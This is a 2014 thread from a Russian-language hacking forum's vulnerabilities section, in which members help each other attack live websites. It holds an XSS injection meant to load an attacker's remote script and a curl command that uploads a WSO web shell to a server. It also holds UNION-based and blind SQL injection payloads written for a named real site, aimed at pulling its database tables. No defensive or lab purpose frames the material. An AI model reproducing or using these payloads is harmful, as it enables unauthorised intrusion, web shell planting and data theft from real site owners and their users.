HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #23821  
Старый 08.10.2014, 09:30
WendM
Guest
Сообщений: n/a
Провел на форуме:
11466

Репутация: 3
По умолчанию

Добрый день.

Имеется сайт с XSS: http://site.com/?name=XSS_TEXT

Html код этой страницы такой:

Код:
Code:

  

...
В свою очередь http://site.com/javascript-file.js?param=XSS_TEXT отдает вот что:

Код:
Code:
var  sss = {
  "param1" : 1,
  "param2" : {
    "param3" : 3,
    "param4" : "XSS_TEXT"
   }
};
Проблема в том что режется ' , ( , ) , scripts .

Поэтому все известные мне методы сразу отпали. Максимум чего мне удалось дописать это вот что:

http://site.com/javascript-file.js?param="}};document.head.childNodes[1].src="http://mysite.com/global.js";var b={"1":{"1":"

Код:
Code:
var  sss = {
  "param1" : 1,
  "param2" : {
    "param3" : 3,
    "param4" : ""}};
document.head.childNodes[1].src="http://mysite.com/global.js";
var b={"1":{"1":""
   }
};
Fосле выполнения моего кода http://site.com/?name="}};document.head.childNodes[1].src="http://mysite.com/global.js";var b={"1":{"1":" получается таким:

Код:
Code:

  

...
src меняется на мой, но прогрузки файла не происходит, соответственно и JS код не выполняется. Я не спец в JS, много не знаю. Поэтому прошу помочь обойти эту защиту, цель подключить и выполнить мой js файл(http://mysite.com/global.js)

Спасибо
 
Ответить с цитированием

  #23822  
Старый 08.10.2014, 12:50
TIGERSSS
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 5
По умолчанию

Цитата:
Сообщение от XAMEHA  
XAMEHA said:
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]curl[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]F[/COLOR][COLOR="#DD0000"]"file=@/home/user/shell/wso2.php"[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]F[/COLOR][COLOR="#DD0000"]"Name=/var/www/wso2.php"[/COLOR][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//site.com/file.php

[/COLOR][/COLOR
А можно еще детальнее?

Я ведь не введу в адресную строку браузера это?
 
Ответить с цитированием

  #23823  
Старый 08.10.2014, 12:55
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

TIGERSSS,

https://ru.wikipedia.org/wiki/CURL
 
Ответить с цитированием

  #23824  
Старый 08.10.2014, 15:26
XAMEHA
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268

Репутация: 0
По умолчанию

TIGERSSS, Что вы хотите получить? Эту уязвимость нельзя проэксплуатировать только с помощью адресной строки браузера.

WendM, Строки можно представить в HEX-виде. Для выполнения можно использовать document.location и протокол javascript (не уверен, что схема заработает на всех современных браузерах).
 
Ответить с цитированием

  #23825  
Старый 08.10.2014, 16:38
TIGERSSS
Guest
Сообщений: n/a
Провел на форуме:
0

Репутация: 5
По умолчанию

Цитата:
Сообщение от XAMEHA  
XAMEHA said:
TIGERSSS,
Что вы хотите получить? Эту уязвимость нельзя проэксплуатировать только с помощью адресной строки браузера.
Пример загрузки, или выполнения wso шелла с её помощью.
 
Ответить с цитированием

  #23826  
Старый 08.10.2014, 16:46
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Код:
Code:
curl -F "file=@/home/user/shell/wso2.php" -F "Name=/var/www/wso2.php" http://site.com/file.php
где "file=@/home/user/shell/wso2.php" путь до шелла на вашем пк. файл будет перемещен в папку "/var/www/" и доступен по адресу http://site.com/file.php, если /var/www/ путь до корневой папки сайта.

если передать в качестве Name="./", файл будет перемещен в ту же папку, где выполняется ваш скрипт. и доступен из под веба там же
 
Ответить с цитированием

  #23827  
Старый 13.10.2014, 20:18
madam
Guest
Сообщений: n/a
Провел на форуме:
50513

Репутация: 1
По умолчанию

подскажите,пожалуйста.

при таком запросе сайт.ру/паппка/?id=2+union+all+select+0x31303235343830303536,(sel ect+distinct+concat(0x27,unhex(Hex(cast(schema_nam e+as+char))),0x27)+from+`information_schema`.schem ata+limit+1,1),0x31303235343830303536-- узнаю название базы ,но вытащить таблицы не могу сайт.ру/паппка/?id=2+union+all+select+0x31303235343830303536,(sel ect+concat(0x27,count(table_name),0x27)+from+`info rmation_schema`.tables+where+table_schema=0x6A7573 74626974635F626974707463),0x31303235343830303536--

как можно вытащить таблицы из базы?
 
Ответить с цитированием

  #23828  
Старый 13.10.2014, 20:46
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от madam  
madam said:
подскажите,пожалуйста.
при таком запросе сайт.ру/паппка/?id=2+union+all+select+0x31303235343830303536,(sel ect+distinct+concat(0x27,unhex(Hex(cast(schema_nam e+as+char))),0x27)+from+`information_schema`.schem ata+limit+1,1),0x31303235343830303536-- узнаю название базы ,но вытащить таблицы не могу сайт.ру/паппка/?id=2+union+all+select+0x31303235343830303536,(sel ect+concat(0x27,count(table_name),0x27)+from+`info rmation_schema`.tables+where+table_schema=0x6A7573 74626974635F626974707463),0x31303235343830303536--
как можно вытащить таблицы из базы?
у вас функция count(table_name) — она выводит количество таблиц в вашей базе. чтобы вывести таблицы, запрос будет примерно таким:

Код:
Code:
?id=2+union+all+select+0x31303235343830303536,(select+concat(0x7e,0x27,table_name,0x27,0x7e)+from+`information_schema`.tables+where+table_schema=0x6A757374626974635F626974707463+limit+1,1),0x31303235343830303536--
и да, havij — грешно. нормальный запрос бы выглядел так:

Код:
Code:
+union+select+1,table_name,2+from+`information_schema`.tables+where+table_schema=0x6A757374626974635F626974707463+limit+1,1--+
далее перебирайте limit.
 
Ответить с цитированием

  #23829  
Старый 13.10.2014, 21:11
madam
Guest
Сообщений: n/a
Провел на форуме:
50513

Репутация: 1
По умолчанию

спасибо конечно,вот только без havij никак,редирект на главную стр.(

да и havij дальше имя базы не продвигается((

вот ссылка http://bitptc. com/recommends/?id=5 db justbitc_bitptc
 
Ответить с цитированием

  #23830  
Старый 13.10.2014, 22:10
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

тогда в вашем случае стоит раскручивать как blind sql.

Код:
Code:
http://bitptc.com/recommends/?id=5+and+1=1--+
- редирект (значит запрос корректен)

Код:
Code:
http://bitptc.com/recommends/?id=5+and+1=2--+
- нет редиректа
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ